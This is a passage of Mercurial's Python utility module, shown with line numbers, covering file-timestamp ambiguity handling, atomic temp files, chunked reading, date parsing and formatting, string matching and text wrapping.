1711 1933 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1712 1934 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1713 1935 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1714 1936 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1715 1937
1716 1938 Case (*2) above means that a file was changed twice or more at
1717 1939 same time in sec (= S[n-1].ctime), and comparison of timestamp
1718 1940 is ambiguous.
1719 1941
1720 1942 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1721 1943 timestamp is ambiguous".
1722 1944
1723 1945 But advancing mtime only in case (*2) doesn't work as
1724 1946 expected, because naturally advanced S[n].mtime in case (*1)
1725 1947 might be equal to manually advanced S[n-1 or earlier].mtime.
1726 1948
1727 1949 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1728 1950 treated as ambiguous regardless of mtime, to avoid overlooking
1729 1951 by confliction between such mtime.
1730 1952
1731 1953 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1732 1954 S[n].mtime", even if size of a file isn't changed.
1733 1955 """
1734 1956 try:
1735 1957 return (self.stat.st_ctime == old.stat.st_ctime)
1736 1958 except AttributeError:
1737 1959 return False
1738 1960
1739 1961 def avoidambig(self, path, old):
1740 1962 """Change file stat of specified path to avoid ambiguity
1741 1963
1742 1964 'old' should be previous filestat of 'path'.
1743 1965
1744 1966 This skips avoiding ambiguity, if a process doesn't have
1745 1967 appropriate privileges for 'path'. This returns False in this
1746 1968 case.
1747 1969
1748 1970 Otherwise, this returns True, as "ambiguity is avoided".
1749 1971 """
1750 1972 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1751 1973 try:
1752 1974 os.utime(path, (advanced, advanced))
1753 1975 except OSError as inst:
1754 1976 if inst.errno == errno.EPERM:
1755 1977 # utime() on the file created by another user causes EPERM,
1756 1978 # if a process doesn't have appropriate privileges
1757 1979 return False
1758 1980 raise
1759 1981 return True
1760 1982
1761 1983 def __ne__(self, other):
1762 1984 return not self == other
1763 1985
1764 1986 class atomictempfile(object):
1765 1987 '''writable file object that atomically updates a file
1766 1988
1767 1989 All writes will go to a temporary copy of the original file. Call
1768 1990 close() when you are done writing, and atomictempfile will rename
1769 1991 the temporary copy to the original name, making the changes
1770 1992 visible. If the object is destroyed without being closed, all your
1771 1993 writes are discarded.
1772 1994
1773 1995 checkambig argument of constructor is used with filestat, and is
1774 1996 useful only if target file is guarded by any lock (e.g. repo.lock
1775 1997 or repo.wlock).
1776 1998 '''
1777 1999 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1778 2000 self.__name = name # permanent name
1779 2001 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1780 2002 createmode=createmode)
1781 2003 self._fp = posixfile(self._tempname, mode)
1782 2004 self._checkambig = checkambig
1783 2005
1784 2006 # delegated methods
1785 2007 self.read = self._fp.read
1786 2008 self.write = self._fp.write
1787 2009 self.seek = self._fp.seek
1788 2010 self.tell = self._fp.tell
1789 2011 self.fileno = self._fp.fileno
1790 2012
1791 2013 def close(self):
1792 2014 if not self._fp.closed:
1793 2015 self._fp.close()
1794 2016 filename = localpath(self.__name)
1795 2017 oldstat = self._checkambig and filestat.frompath(filename)
1796 2018 if oldstat and oldstat.stat:
1797 2019 rename(self._tempname, filename)
1798 2020 newstat = filestat.frompath(filename)
1799 2021 if newstat.isambig(oldstat):
1800 2022 # stat of changed file is ambiguous to original one
1801 2023 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1802 2024 os.utime(filename, (advanced, advanced))
1803 2025 else:
1804 2026 rename(self._tempname, filename)
1805 2027
1806 2028 def discard(self):
1807 2029 if not self._fp.closed:
1808 2030 try:
1809 2031 os.unlink(self._tempname)
1810 2032 except OSError:
1811 2033 pass
1812 2034 self._fp.close()
1813 2035
1814 2036 def __del__(self):
1815 2037 if safehasattr(self, '_fp'): # constructor actually did something
1816 2038 self.discard()
1817 2039
1818 2040 def __enter__(self):
1819 2041 return self
1820 2042
1821 2043 def __exit__(self, exctype, excvalue, traceback):
1822 2044 if exctype is not None:
1823 2045 self.discard()
1824 2046 else:
1825 2047 self.close()
1826 2048
1827 2049 def unlinkpath(f, ignoremissing=False):
1828 2050 """unlink and remove the directory if it is empty"""
1829 2051 if ignoremissing:
1830 2052 tryunlink(f)
1831 2053 else:
1832 2054 unlink(f)
1833 2055 # try removing directories that might now be empty
1834 2056 try:
1835 2057 removedirs(os.path.dirname(f))
1836 2058 except OSError:
1837 2059 pass
1838 2060
1839 2061 def tryunlink(f):
1840 2062 """Attempt to remove a file, ignoring ENOENT errors."""
1841 2063 try:
1842 2064 unlink(f)
1843 2065 except OSError as e:
1844 2066 if e.errno != errno.ENOENT:
1845 2067 raise
1846 2068
1847 2069 def makedirs(name, mode=None, notindexed=False):
1848 2070 """recursive directory creation with parent mode inheritance
1849 2071
1850 2072 Newly created directories are marked as "not to be indexed by
1851 2073 the content indexing service", if ``notindexed`` is specified
1852 2074 for "write" mode access.
1853 2075 """
1854 2076 try:
1855 2077 makedir(name, notindexed)
1856 2078 except OSError as err:
1857 2079 if err.errno == errno.EEXIST:
1858 2080 return
1859 2081 if err.errno != errno.ENOENT or not name:
1860 2082 raise
1861 2083 parent = os.path.dirname(os.path.abspath(name))
1862 2084 if parent == name:
1863 2085 raise
1864 2086 makedirs(parent, mode, notindexed)
1865 2087 try:
1866 2088 makedir(name, notindexed)
1867 2089 except OSError as err:
1868 2090 # Catch EEXIST to handle races
1869 2091 if err.errno == errno.EEXIST:
1870 2092 return
1871 2093 raise
1872 2094 if mode is not None:
1873 2095 os.chmod(name, mode)
1874 2096
1875 2097 def readfile(path):
1876 2098 with open(path, 'rb') as fp:
1877 2099 return fp.read()
1878 2100
1879 2101 def writefile(path, text):
1880 2102 with open(path, 'wb') as fp:
1881 2103 fp.write(text)
1882 2104
1883 2105 def appendfile(path, text):
1884 2106 with open(path, 'ab') as fp:
1885 2107 fp.write(text)
1886 2108
1887 2109 class chunkbuffer(object):
1888 2110 """Allow arbitrary sized chunks of data to be efficiently read from an
1889 2111 iterator over chunks of arbitrary size."""
1890 2112
1891 2113 def __init__(self, in_iter):
1892 2114 """in_iter is the iterator that's iterating over the input chunks."""
1893 2115 def splitbig(chunks):
1894 2116 for chunk in chunks:
1895 2117 if len(chunk) > 2**20:
1896 2118 pos = 0
1897 2119 while pos < len(chunk):
1898 2120 end = pos + 2 ** 18
1899 2121 yield chunk[pos:end]
1900 2122 pos = end
1901 2123 else:
1902 2124 yield chunk
1903 2125 self.iter = splitbig(in_iter)
1904 2126 self._queue = collections.deque()
1905 2127 self._chunkoffset = 0
1906 2128
1907 2129 def read(self, l=None):
1908 2130 """Read L bytes of data from the iterator of chunks of data.
1909 2131 Returns less than L bytes if the iterator runs dry.
1910 2132
1911 2133 If size parameter is omitted, read everything"""
1912 2134 if l is None:
1913 2135 return ''.join(self.iter)
1914 2136
1915 2137 left = l
1916 2138 buf = []
1917 2139 queue = self._queue
1918 2140 while left > 0:
1919 2141 # refill the queue
1920 2142 if not queue:
1921 2143 target = 2**18
1922 2144 for chunk in self.iter:
1923 2145 queue.append(chunk)
1924 2146 target -= len(chunk)
1925 2147 if target <= 0:
1926 2148 break
1927 2149 if not queue:
1928 2150 break
1929 2151
1930 2152 # The easy way to do this would be to queue.popleft(), modify the
1931 2153 # chunk (if necessary), then queue.appendleft(). However, for cases
1932 2154 # where we read partial chunk content, this incurs 2 dequeue
1933 2155 # mutations and creates a new str for the remaining chunk in the
1934 2156 # queue. Our code below avoids this overhead.
1935 2157
1936 2158 chunk = queue[0]
1937 2159 chunkl = len(chunk)
1938 2160 offset = self._chunkoffset
1939 2161
1940 2162 # Use full chunk.
1941 2163 if offset == 0 and left >= chunkl:
1942 2164 left -= chunkl
1943 2165 queue.popleft()
1944 2166 buf.append(chunk)
1945 2167 # self._chunkoffset remains at 0.
1946 2168 continue
1947 2169
1948 2170 chunkremaining = chunkl - offset
1949 2171
1950 2172 # Use all of unconsumed part of chunk.
1951 2173 if left >= chunkremaining:
1952 2174 left -= chunkremaining
1953 2175 queue.popleft()
1954 2176 # offset == 0 is enabled by block above, so this won't merely
1955 2177 # copy via ``chunk[0:]``.
1956 2178 buf.append(chunk[offset:])
1957 2179 self._chunkoffset = 0
1958 2180
1959 2181 # Partial chunk needed.
1960 2182 else:
1961 2183 buf.append(chunk[offset:offset + left])
1962 2184 self._chunkoffset += left
1963 2185 left -= chunkremaining
1964 2186
1965 2187 return ''.join(buf)
1966 2188
1967 2189 def filechunkiter(f, size=131072, limit=None):
1968 2190 """Create a generator that produces the data in the file size
1969 2191 (default 131072) bytes at a time, up to optional limit (default is
1970 2192 to read all data). Chunks may be less than size bytes if the
1971 2193 chunk is the last chunk in the file, or the file is a socket or
1972 2194 some other type of file that sometimes reads less data than is
1973 2195 requested."""
1974 2196 assert size >= 0
1975 2197 assert limit is None or limit >= 0
1976 2198 while True:
1977 2199 if limit is None:
1978 2200 nbytes = size
1979 2201 else:
1980 2202 nbytes = min(limit, size)
1981 2203 s = nbytes and f.read(nbytes)
1982 2204 if not s:
1983 2205 break
1984 2206 if limit:
1985 2207 limit -= len(s)
1986 2208 yield s
1987 2209
1988 2210 class cappedreader(object):
1989 2211 """A file object proxy that allows reading up to N bytes.
1990 2212
1991 2213 Given a source file object, instances of this type allow reading up to
1992 2214 N bytes from that source file object. Attempts to read past the allowed
1993 2215 limit are treated as EOF.
1994 2216
1995 2217 It is assumed that I/O is not performed on the original file object
1996 2218 in addition to I/O that is performed by this instance. If there is,
1997 2219 state tracking will get out of sync and unexpected results will ensue.
1998 2220 """
1999 2221 def __init__(self, fh, limit):
2000 2222 """Allow reading up to <limit> bytes from <fh>."""
2001 2223 self._fh = fh
2002 2224 self._left = limit
2003 2225
2004 2226 def read(self, n=-1):
2005 2227 if not self._left:
2006 2228 return b''
2007 2229
2008 2230 if n < 0:
2009 2231 n = self._left
2010 2232
2011 2233 data = self._fh.read(min(n, self._left))
2012 2234 self._left -= len(data)
2013 2235 assert self._left >= 0
2014 2236
2015 2237 return data
2016 2238
2017 2239 def makedate(timestamp=None):
2018 2240 '''Return a unix timestamp (or the current time) as a (unixtime,
2019 2241 offset) tuple based off the local timezone.'''
2020 2242 if timestamp is None:
2021 2243 timestamp = time.time()
2022 2244 if timestamp < 0:
2023 2245 hint = _("check your clock")
2024 2246 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2025 2247 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2026 2248 datetime.datetime.fromtimestamp(timestamp))
2027 2249 tz = delta.days * 86400 + delta.seconds
2028 2250 return timestamp, tz
2029 2251
2030 2252 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2031 2253 """represent a (unixtime, offset) tuple as a localized time.
2032 2254 unixtime is seconds since the epoch, and offset is the time zone's
2033 2255 number of seconds away from UTC.
2034 2256
2035 2257 >>> datestr((0, 0))
2036 2258 'Thu Jan 01 00:00:00 1970 +0000'
2037 2259 >>> datestr((42, 0))
2038 2260 'Thu Jan 01 00:00:42 1970 +0000'
2039 2261 >>> datestr((-42, 0))
2040 2262 'Wed Dec 31 23:59:18 1969 +0000'
2041 2263 >>> datestr((0x7fffffff, 0))
2042 2264 'Tue Jan 19 03:14:07 2038 +0000'
2043 2265 >>> datestr((-0x80000000, 0))
2044 2266 'Fri Dec 13 20:45:52 1901 +0000'
2045 2267 """
2046 2268 t, tz = date or makedate()
2047 2269 if "%1" in format or "%2" in format or "%z" in format:
2048 2270 sign = (tz > 0) and "-" or "+"
2049 2271 minutes = abs(tz) // 60
2050 2272 q, r = divmod(minutes, 60)
2051 2273 format = format.replace("%z", "%1%2")
2052 2274 format = format.replace("%1", "%c%02d" % (sign, q))
2053 2275 format = format.replace("%2", "%02d" % r)
2054 2276 d = t - tz
2055 2277 if d > 0x7fffffff:
2056 2278 d = 0x7fffffff
2057 2279 elif d < -0x80000000:
2058 2280 d = -0x80000000
2059 2281 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2060 2282 # because they use the gmtime() system call which is buggy on Windows
2061 2283 # for negative values.
2062 2284 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2063 2285 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2064 2286 return s
2065 2287
2066 2288 def shortdate(date=None):
2067 2289 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2068 2290 return datestr(date, format='%Y-%m-%d')
2069 2291
2070 2292 def parsetimezone(s):
2071 2293 """find a trailing timezone, if any, in string, and return a
2072 2294 (offset, remainder) pair"""
2073 2295
2074 2296 if s.endswith("GMT") or s.endswith("UTC"):
2075 2297 return 0, s[:-3].rstrip()
2076 2298
2077 2299 # Unix-style timezones [+-]hhmm
2078 2300 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2079 2301 sign = (s[-5] == "+") and 1 or -1
2080 2302 hours = int(s[-4:-2])
2081 2303 minutes = int(s[-2:])
2082 2304 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2083 2305
2084 2306 # ISO8601 trailing Z
2085 2307 if s.endswith("Z") and s[-2:-1].isdigit():
2086 2308 return 0, s[:-1]
2087 2309
2088 2310 # ISO8601-style [+-]hh:mm
2089 2311 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2090 2312 s[-5:-3].isdigit() and s[-2:].isdigit()):
2091 2313 sign = (s[-6] == "+") and 1 or -1
2092 2314 hours = int(s[-5:-3])
2093 2315 minutes = int(s[-2:])
2094 2316 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2095 2317
2096 2318 return None, s
2097 2319
2098 2320 def strdate(string, format, defaults=None):
2099 2321 """parse a localized time string and return a (unixtime, offset) tuple.
2100 2322 if the string cannot be parsed, ValueError is raised."""
2101 2323 if defaults is None:
2102 2324 defaults = {}
2103 2325
2104 2326 # NOTE: unixtime = localunixtime + offset
2105 2327 offset, date = parsetimezone(string)
2106 2328
2107 2329 # add missing elements from defaults
2108 2330 usenow = False # default to using biased defaults
2109 2331 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2110 2332 part = pycompat.bytestr(part)
2111 2333 found = [True for p in part if ("%"+p) in format]
2112 2334 if not found:
2113 2335 date += "@" + defaults[part][usenow]
2114 2336 format += "@%" + part[0]
2115 2337 else:
2116 2338 # We've found a specific time element, less specific time
2117 2339 # elements are relative to today
2118 2340 usenow = True
2119 2341
2120 2342 timetuple = time.strptime(encoding.strfromlocal(date),
2121 2343 encoding.strfromlocal(format))
2122 2344 localunixtime = int(calendar.timegm(timetuple))
2123 2345 if offset is None:
2124 2346 # local timezone
2125 2347 unixtime = int(time.mktime(timetuple))
2126 2348 offset = unixtime - localunixtime
2127 2349 else:
2128 2350 unixtime = localunixtime + offset
2129 2351 return unixtime, offset
2130 2352
2131 2353 def parsedate(date, formats=None, bias=None):
2132 2354 """parse a localized date/time and return a (unixtime, offset) tuple.
2133 2355
2134 2356 The date may be a "unixtime offset" string or in one of the specified
2135 2357 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2136 2358
2137 2359 >>> parsedate(b' today ') == parsedate(
2138 2360 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2139 2361 True
2140 2362 >>> parsedate(b'yesterday ') == parsedate(
2141 2363 ... (datetime.date.today() - datetime.timedelta(days=1)
2142 2364 ... ).strftime('%b %d').encode('ascii'))
2143 2365 True
2144 2366 >>> now, tz = makedate()
2145 2367 >>> strnow, strtz = parsedate(b'now')
2146 2368 >>> (strnow - now) < 1
2147 2369 True
2148 2370 >>> tz == strtz
2149 2371 True
2150 2372 """
2151 2373 if bias is None:
2152 2374 bias = {}
2153 2375 if not date:
2154 2376 return 0, 0
2155 2377 if isinstance(date, tuple) and len(date) == 2:
2156 2378 return date
2157 2379 if not formats:
2158 2380 formats = defaultdateformats
2159 2381 date = date.strip()
2160 2382
2161 2383 if date == 'now' or date == _('now'):
2162 2384 return makedate()
2163 2385 if date == 'today' or date == _('today'):
2164 2386 date = datetime.date.today().strftime(r'%b %d')
2165 2387 date = encoding.strtolocal(date)
2166 2388 elif date == 'yesterday' or date == _('yesterday'):
2167 2389 date = (datetime.date.today() -
2168 2390 datetime.timedelta(days=1)).strftime(r'%b %d')
2169 2391 date = encoding.strtolocal(date)
2170 2392
2171 2393 try:
2172 2394 when, offset = map(int, date.split(' '))
2173 2395 except ValueError:
2174 2396 # fill out defaults
2175 2397 now = makedate()
2176 2398 defaults = {}
2177 2399 for part in ("d", "mb", "yY", "HI", "M", "S"):
2178 2400 # this piece is for rounding the specific end of unknowns
2179 2401 b = bias.get(part)
2180 2402 if b is None:
2181 2403 if part[0:1] in "HMS":
2182 2404 b = "00"
2183 2405 else:
2184 2406 b = "0"
2185 2407
2186 2408 # this piece is for matching the generic end to today's date
2187 2409 n = datestr(now, "%" + part[0:1])
2188 2410
2189 2411 defaults[part] = (b, n)
2190 2412
2191 2413 for format in formats:
2192 2414 try:
2193 2415 when, offset = strdate(date, format, defaults)
2194 2416 except (ValueError, OverflowError):
2195 2417 pass
2196 2418 else:
2197 2419 break
2198 2420 else:
2199 2421 raise error.ParseError(_('invalid date: %r') % date)
2200 2422 # validate explicit (probably user-specified) date and
2201 2423 # time zone offset. values must fit in signed 32 bits for
2202 2424 # current 32-bit linux runtimes. timezones go from UTC-12
2203 2425 # to UTC+14
2204 2426 if when < -0x80000000 or when > 0x7fffffff:
2205 2427 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2206 2428 if offset < -50400 or offset > 43200:
2207 2429 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2208 2430 return when, offset
2209 2431
2210 2432 def matchdate(date):
2211 2433 """Return a function that matches a given date match specifier
2212 2434
2213 2435 Formats include:
2214 2436
2215 2437 '{date}' match a given date to the accuracy provided
2216 2438
2217 2439 '<{date}' on or before a given date
2218 2440
2219 2441 '>{date}' on or after a given date
2220 2442
2221 2443 >>> p1 = parsedate(b"10:29:59")
2222 2444 >>> p2 = parsedate(b"10:30:00")
2223 2445 >>> p3 = parsedate(b"10:30:59")
2224 2446 >>> p4 = parsedate(b"10:31:00")
2225 2447 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2226 2448 >>> f = matchdate(b"10:30")
2227 2449 >>> f(p1[0])
2228 2450 False
2229 2451 >>> f(p2[0])
2230 2452 True
2231 2453 >>> f(p3[0])
2232 2454 True
2233 2455 >>> f(p4[0])
2234 2456 False
2235 2457 >>> f(p5[0])
2236 2458 False
2237 2459 """
2238 2460
2239 2461 def lower(date):
2240 2462 d = {'mb': "1", 'd': "1"}
2241 2463 return parsedate(date, extendeddateformats, d)[0]
2242 2464
2243 2465 def upper(date):
2244 2466 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2245 2467 for days in ("31", "30", "29"):
2246 2468 try:
2247 2469 d["d"] = days
2248 2470 return parsedate(date, extendeddateformats, d)[0]
2249 2471 except error.ParseError:
2250 2472 pass
2251 2473 d["d"] = "28"
2252 2474 return parsedate(date, extendeddateformats, d)[0]
2253 2475
2254 2476 date = date.strip()
2255 2477
2256 2478 if not date:
2257 2479 raise Abort(_("dates cannot consist entirely of whitespace"))
2258 2480 elif date[0] == "<":
2259 2481 if not date[1:]:
2260 2482 raise Abort(_("invalid day spec, use '<DATE'"))
2261 2483 when = upper(date[1:])
2262 2484 return lambda x: x <= when
2263 2485 elif date[0] == ">":
2264 2486 if not date[1:]:
2265 2487 raise Abort(_("invalid day spec, use '>DATE'"))
2266 2488 when = lower(date[1:])
2267 2489 return lambda x: x >= when
2268 2490 elif date[0] == "-":
2269 2491 try:
2270 2492 days = int(date[1:])
2271 2493 except ValueError:
2272 2494 raise Abort(_("invalid day spec: %s") % date[1:])
2273 2495 if days < 0:
2274 2496 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2275 2497 % date[1:])
2276 2498 when = makedate()[0] - days * 3600 * 24
2277 2499 return lambda x: x >= when
2278 2500 elif " to " in date:
2279 2501 a, b = date.split(" to ")
2280 2502 start, stop = lower(a), upper(b)
2281 2503 return lambda x: x >= start and x <= stop
2282 2504 else:
2283 2505 start, stop = lower(date), upper(date)
2284 2506 return lambda x: x >= start and x <= stop
2285 2507
2286 2508 def stringmatcher(pattern, casesensitive=True):
2287 2509 """
2288 2510 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2289 2511 returns the matcher name, pattern, and matcher function.
2290 2512 missing or unknown prefixes are treated as literal matches.
2291 2513
2292 2514 helper for tests:
2293 2515 >>> def test(pattern, *tests):
2294 2516 ... kind, pattern, matcher = stringmatcher(pattern)
2295 2517 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2296 2518 >>> def itest(pattern, *tests):
2297 2519 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2298 2520 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2299 2521
2300 2522 exact matching (no prefix):
2301 2523 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2302 2524 ('literal', 'abcdefg', [False, False, True])
2303 2525
2304 2526 regex matching ('re:' prefix)
2305 2527 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2306 2528 ('re', 'a.+b', [False, False, True])
2307 2529
2308 2530 force exact matches ('literal:' prefix)
2309 2531 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2310 2532 ('literal', 're:foobar', [False, True])
2311 2533
2312 2534 unknown prefixes are ignored and treated as literals
2313 2535 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2314 2536 ('literal', 'foo:bar', [False, False, True])
2315 2537
2316 2538 case insensitive regex matches
2317 2539 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2318 2540 ('re', 'A.+b', [False, False, True])
2319 2541
2320 2542 case insensitive literal matches
2321 2543 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2322 2544 ('literal', 'ABCDEFG', [False, False, True])
2323 2545 """
2324 2546 if pattern.startswith('re:'):
2325 2547 pattern = pattern[3:]
2326 2548 try:
2327 2549 flags = 0
2328 2550 if not casesensitive:
2329 2551 flags = remod.I
2330 2552 regex = remod.compile(pattern, flags)
2331 2553 except remod.error as e:
2332 2554 raise error.ParseError(_('invalid regular expression: %s')
2333 2555 % e)
2334 2556 return 're', pattern, regex.search
2335 2557 elif pattern.startswith('literal:'):
2336 2558 pattern = pattern[8:]
2337 2559
2338 2560 match = pattern.__eq__
2339 2561
2340 2562 if not casesensitive:
2341 2563 ipat = encoding.lower(pattern)
2342 2564 match = lambda s: ipat == encoding.lower(s)
2343 2565 return 'literal', pattern, match
2344 2566
2345 2567 def shortuser(user):
2346 2568 """Return a short representation of a user name or email address."""
2347 2569 f = user.find('@')
2348 2570 if f >= 0:
2349 2571 user = user[:f]
2350 2572 f = user.find('<')
2351 2573 if f >= 0:
2352 2574 user = user[f + 1:]
2353 2575 f = user.find(' ')
2354 2576 if f >= 0:
2355 2577 user = user[:f]
2356 2578 f = user.find('.')
2357 2579 if f >= 0:
2358 2580 user = user[:f]
2359 2581 return user
2360 2582
2361 2583 def emailuser(user):
2362 2584 """Return the user portion of an email address."""
2363 2585 f = user.find('@')
2364 2586 if f >= 0:
2365 2587 user = user[:f]
2366 2588 f = user.find('<')
2367 2589 if f >= 0:
2368 2590 user = user[f + 1:]
2369 2591 return user
2370 2592
2371 2593 def email(author):
2372 2594 '''get email of author.'''
2373 2595 r = author.find('>')
2374 2596 if r == -1:
2375 2597 r = None
2376 2598 return author[author.find('<') + 1:r]
2377 2599
2378 2600 def ellipsis(text, maxlength=400):
2379 2601 """Trim string to at most maxlength (default: 400) columns in display."""
2380 2602 return encoding.trim(text, maxlength, ellipsis='...')
2381 2603
2382 2604 def unitcountfn(*unittable):
2383 2605 '''return a function that renders a readable count of some quantity'''
2384 2606
2385 2607 def go(count):
2386 2608 for multiplier, divisor, format in unittable:
2387 2609 if abs(count) >= divisor * multiplier:
2388 2610 return format % (count / float(divisor))
2389 2611 return unittable[-1][2] % count
2390 2612
2391 2613 return go
2392 2614
2393 2615 def processlinerange(fromline, toline):
2394 2616 """Check that linerange <fromline>:<toline> makes sense and return a
2395 2617 0-based range.
2396 2618
2397 2619 >>> processlinerange(10, 20)
2398 2620 (9, 20)
2399 2621 >>> processlinerange(2, 1)
2400 2622 Traceback (most recent call last):
2401 2623 ...
2402 2624 ParseError: line range must be positive
2403 2625 >>> processlinerange(0, 5)
2404 2626 Traceback (most recent call last):
2405 2627 ...
2406 2628 ParseError: fromline must be strictly positive
2407 2629 """
2408 2630 if toline - fromline < 0:
2409 2631 raise error.ParseError(_("line range must be positive"))
2410 2632 if fromline < 1:
2411 2633 raise error.ParseError(_("fromline must be strictly positive"))
2412 2634 return fromline - 1, toline
2413 2635
2414 2636 bytecount = unitcountfn(
2415 2637 (100, 1 << 30, _('%.0f GB')),
2416 2638 (10, 1 << 30, _('%.1f GB')),
2417 2639 (1, 1 << 30, _('%.2f GB')),
2418 2640 (100, 1 << 20, _('%.0f MB')),
2419 2641 (10, 1 << 20, _('%.1f MB')),
2420 2642 (1, 1 << 20, _('%.2f MB')),
2421 2643 (100, 1 << 10, _('%.0f KB')),
2422 2644 (10, 1 << 10, _('%.1f KB')),
2423 2645 (1, 1 << 10, _('%.2f KB')),
2424 2646 (1, 1, _('%.0f bytes')),
2425 2647 )
2426 2648
2427 2649 # Matches a single EOL which can either be a CRLF where repeated CR
2428 2650 # are removed or a LF. We do not care about old Macintosh files, so a
2429 2651 # stray CR is an error.
2430 2652 _eolre = remod.compile(br'\r*\n')
2431 2653
2432 2654 def tolf(s):
2433 2655 return _eolre.sub('\n', s)
2434 2656
2435 2657 def tocrlf(s):
2436 2658 return _eolre.sub('\r\n', s)
2437 2659
2438 2660 if pycompat.oslinesep == '\r\n':
2439 2661 tonativeeol = tocrlf
2440 2662 fromnativeeol = tolf
2441 2663 else:
2442 2664 tonativeeol = pycompat.identity
2443 2665 fromnativeeol = pycompat.identity
2444 2666
2445 2667 def escapestr(s):
2446 2668 # call underlying function of s.encode('string_escape') directly for
2447 2669 # Python 3 compatibility
2448 2670 return codecs.escape_encode(s)[0]
2449 2671
2450 2672 def unescapestr(s):
2451 2673 return codecs.escape_decode(s)[0]
2452 2674
2453 2675 def forcebytestr(obj):
2454 2676 """Portably format an arbitrary object (e.g. exception) into a byte
2455 2677 string."""
2456 2678 try:
2457 2679 return pycompat.bytestr(obj)
2458 2680 except UnicodeEncodeError:
2459 2681 # non-ascii string, may be lossy
2460 2682 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2461 2683
2462 2684 def uirepr(s):
2463 2685 # Avoid double backslash in Windows path repr()
2464 2686 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2465 2687
2466 2688 # delay import of textwrap
2467 2689 def MBTextWrapper(**kwargs):
2468 2690 class tw(textwrap.TextWrapper):
2469 2691 """
2470 2692 Extend TextWrapper for width-awareness.
2471 2693
2472 2694 Neither number of 'bytes' in any encoding nor 'characters' is
2473 2695 appropriate to calculate terminal columns for specified string.
2474 2696
2475 2697 Original TextWrapper implementation uses built-in 'len()' directly,
2476 2698 so overriding is needed to use width information of each characters.
2477 2699
2478 2700 In addition, characters classified into 'ambiguous' width are
2479 2701 treated as wide in East Asian area, but as narrow in other.
2480 2702
2481 2703 This requires use decision to determine width of such characters.
2482 2704 """
2483 2705 def _cutdown(self, ucstr, space_left):
2484 2706 l = 0
2485 2707 colwidth = encoding.ucolwidth
2486 2708 for i in xrange(len(ucstr)):
2487 2709 l += colwidth(ucstr[i])
2488 2710 if space_left < l:
2489 2711 return (ucstr[:i], ucstr[i:])
2490 2712 return ucstr, ''
2491 2713
2492 2714 # overriding of base class
2493 2715 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2494 2716 space_left = max(width - cur_len, 1)
2495 2717
2496 2718 if self.break_long_words:
2497 2719 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2498 2720 cur_line.append(cut)
2499 2721 reversed_chunks[-1] = res
2500 2722 elif not cur_line:
2501 2723 cur_line.append(reversed_chunks.pop())
2502 2724
2503 2725 # this overriding code is imported from TextWrapper of Python 2.6
2504 2726 # to calculate columns of string by 'encoding.ucolwidth()'
2505 2727 def _wrap_chunks(self, chunks):
2506 2728 colwidth = encoding.ucolwidth
2507 2729
2508 2730 lines = []
2509 2731 if self.width <= 0:
2510 2732 raise ValueError("invalid width %r (must be > 0)" % self.width)
2511 2733
2512 2734 # Arrange in reverse order so items can be efficiently popped
2513 2735 # from a stack of chucks.
2514 2736 chunks.reverse()
2515 2737
2516 2738 while chunks:
2517 2739
2518 2740 # Start the list of chunks that will make up the current line.
2519 2741 # cur_len is just the length of all the chunks in cur_line.
2520 2742 cur_line = []
2521 2743 cur_len = 0
2522 2744
2523 2745 # Figure out which static string will prefix this line.
2524 2746 if lines:
2525 2747 indent = self.subsequent_indent
2526 2748 else:
2527 2749 indent = self.initial_indent
2528 2750
2529 2751 # Maximum width for this line.
2530 2752 width = self.width - len(indent)
2531 2753
2532 2754 # First chunk on line is whitespace -- drop it, unless this
2533 2755 # is the very beginning of the text (i.e. no lines started yet).
2534 2756 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2535 2757 del chunks[-1]
2536 2758
2537 2759 while chunks:
2538 2760 l = colwidth(chunks[-1])
2539 2761
2540 2762 # Can at least squeeze this chunk onto the current line.
2541 2763 if cur_len + l <= width:
2542 2764 cur_line.append(chunks.pop())
2543 2765 cur_len += l
2544 2766
2545 2767 # Nope, this line is full.
2546 2768 else:
2547 2769 break
2548 2770
2549 2771 # The current line is full, and the next chunk is too big to
